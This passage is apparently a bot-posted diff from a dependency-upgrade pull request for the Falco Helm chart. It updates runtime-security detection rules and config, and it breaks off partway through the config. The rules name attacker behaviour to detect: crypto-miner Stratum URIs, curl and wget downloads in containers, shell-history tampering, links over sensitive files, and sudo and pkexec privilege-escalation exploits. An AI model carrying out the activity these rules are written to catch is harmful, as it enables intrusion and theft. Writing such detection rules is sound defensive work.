                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3050,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3074,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3110,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
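The `openat2` additions throughout these hunks track the syscall introduced in Linux 5.6; conditions matching only `open`/`openat` would miss file creation performed through it. A toy predicate mirroring the "creat, or open-family with O_CREAT" check (illustrative only; event types and flag strings are simplified):

```python
# Illustrative only: models the "evt.type = creat or open*+O_CREAT" condition.
def creates_file(evt_type: str, flags: str) -> bool:
    return evt_type == "creat" or (
        evt_type in ("open", "openat", "openat2") and "O_CREAT" in flags
    )

print(creates_file("openat2", "O_WRONLY|O_CREAT"))  # True
print(creates_file("openat2", "O_RDONLY"))          # False
```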
@@ -2686,7 +3124,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3178,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2948,15 +3387,15 @@
       condition: >
         (modify and (
           evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
           evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
           evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
@@ -2964,7 +3403,7 @@
       condition: >
         (open_write and (
           fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
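The history-file hunks above switch `zsh_history` matching from `contains` (substring) to `endswith` (suffix), which avoids flagging files that merely mention the name. A quick sketch of the difference (paths are made-up examples):

```python
# "contains" is a substring test, "endswith" a suffix test.
def matches_contains(path: str) -> bool:
    return "zsh_history" in path

def matches_endswith(path: str) -> bool:
    return path.endswith("zsh_history")

hits = "/root/.zsh_history"                        # the live history file
miss = "/tmp/restore_zsh_history_backup.tar"       # only mentions the name

print(matches_contains(hits), matches_endswith(hits))   # True True
print(matches_contains(miss), matches_endswith(miss))   # True False
```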
 
@@ -3003,7 +3442,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3521,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3179,7 +3628,7 @@
       condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
       append: false
 
     # The rule is disabled by default.
@@ -3188,13 +3637,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
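The Stratum rule above is widened from a single `stratum+tcp` substring to the scheme variants miners commonly use. A rough model of the new check (plain Python, not Falco; the sample command lines are invented):

```python
# Models the widened condition: any of the four stratum URI schemes
# appearing anywhere in the spawned process's command line.
STRATUM_MARKERS = ("stratum+tcp", "stratum2+tcp", "stratum+ssl", "stratum2+ssl")

def looks_like_stratum(cmdline: str) -> bool:
    return any(marker in cmdline for marker in STRATUM_MARKERS)

print(looks_like_stratum("xmrig -o stratum+ssl://pool.example:443"))  # True
print(looks_like_stratum("curl https://example.com"))                 # False
```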
@@ -3330,7 +3779,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3812,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3862,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
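The CVE-2021-3156 hunk above broadens the rule to match plain `sudo` (not only `sudoedit`) and the long `--login` flag, still anchored on the telltale backslash in the arguments. A simplified Python approximation of the condition (illustrative; argument parsing is reduced to substring checks):

```python
# Approximates the updated condition: non-root user, sudo/sudoedit,
# a shell/login mode flag, and "\ " inside or "\" at the end of the args.
def sudo_cve_2021_3156_suspect(proc_name: str, args: str, uid: int) -> bool:
    name_ok = proc_name in ("sudoedit", "sudo")
    mode_ok = ("-s" in args) or ("-i" in args) or ("--login" in args)
    backslash_ok = ("\\ " in args) or args.endswith("\\")
    return uid != 0 and name_ok and mode_ok and backslash_ok

print(sudo_cve_2021_3156_suspect("sudoedit", "-s testtest\\", uid=1000))  # True
print(sudo_cve_2021_3156_suspect("sudo", "-l", uid=1000))                 # False
```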
@@ -3432,7 +3881,7 @@
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
@@ -3460,6 +3909,51 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which a
+    # Custom condition for use of ingress remote file copy tool in container
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    -  macro: curl_download
+       condition: proc.name = curl and
+                  (proc.cmdline contains " > " or
+                  proc.cmdline contains " >> " or
+                  proc.cmdline contains " | " or
+                  proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
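The new `curl_download` macro in the hunk above flags curl invocations whose command line suggests the response body is written somewhere (shell redirection, a pipe, or an output flag). A small sketch of that heuristic (illustrative only; the real macro checks `proc.name`, which is simplified here to a prefix test, and the sample URLs are invented):

```python
# Mirrors the curl_download substring hints from the macro above.
DOWNLOAD_HINTS = (" > ", " >> ", " | ", " -o ", " --output ", " -O ", " --remote-name ")

def curl_download(cmdline: str) -> bool:
    return cmdline.startswith("curl") and any(h in cmdline for h in DOWNLOAD_HINTS)

print(curl_download("curl -o /tmp/payload http://bad.example"))  # True
print(curl_download("curl http://example.com/health"))           # False
```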
@@ -3618,6 +4112,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3741,7 +4248,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
-        k8s.gcr.io/addon-resizer
+        k8s.gcr.io/addon-resizer,
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
         k8s.gcr.io/k8s-dns-kube-dns-amd64,
@@ -3768,9 +4275,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4326,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -4003,7 +4532,7 @@
     # cluster creation. This may signify a permission setting too broader.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4713,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 0935aaf38698d1d90b1eab3b7ba0b676871a2cb48fc56de1713a4b249eaaa036
+        checksum/rules: 900b3da642a2613387e1173f9a8333aa5ec6fa232d4d0e37868ea5e3c0d89a58
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
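The updated `checksum/config` and `checksum/rules` annotations above change whenever the rendered ConfigMaps change, which forces the DaemonSet pods to roll. A minimal sketch of how such an annotation is typically derived in Helm charts (SHA-256 over the rendered template; the config content below is made up):

```python
# Illustrative: SHA-256 of rendered config content, as used for
# checksum-style pod annotations. The input string is a stand-in.
import hashlib

rendered_config = "json_output: true\nlog_level: info\n"
checksum = hashlib.sha256(rendered_config.encode()).hexdigest()
print(checksum)  # 64 hex characters; changes whenever the config changes
```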
@@ -4196,7 +4725,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.31.1
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4740,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
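The `--k8s-node` change in the hunk above matters because container args are passed to the binary verbatim, with no shell involved: `"${VAR}"`, quotes included, would reach Falco literally, while Kubernetes substitutes only the `$(VAR)` form from the container's env. A tiny illustrative substituter (not the kubelet's implementation):

```python
# Toy version of Kubernetes' $(VAR) expansion in container args:
# only $(NAME) is replaced; shell-style ${NAME} passes through untouched.
import re

def k8s_substitute(arg: str, env: dict) -> str:
    return re.sub(r"\$\(([A-Za-z_][A-Za-z0-9_]*)\)",
                  lambda m: env.get(m.group(1), m.group(0)), arg)

env = {"FALCO_K8S_NODE_NAME": "node-1"}
print(k8s_substitute('--k8s-node="${FALCO_K8S_NODE_NAME}"', env))  # unchanged, quotes and all
print(k8s_substitute("$(FALCO_K8S_NODE_NAME)", env))               # node-1
```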
@@ -4243,6 +4775,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4804,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4837,8 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.18.6 chore(deps): update helm release falco to v1.19.0 Jun 7, 2022
github-actions bot commented Jun 7, 2022

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.0

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. 
This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. 
\"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. 
When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 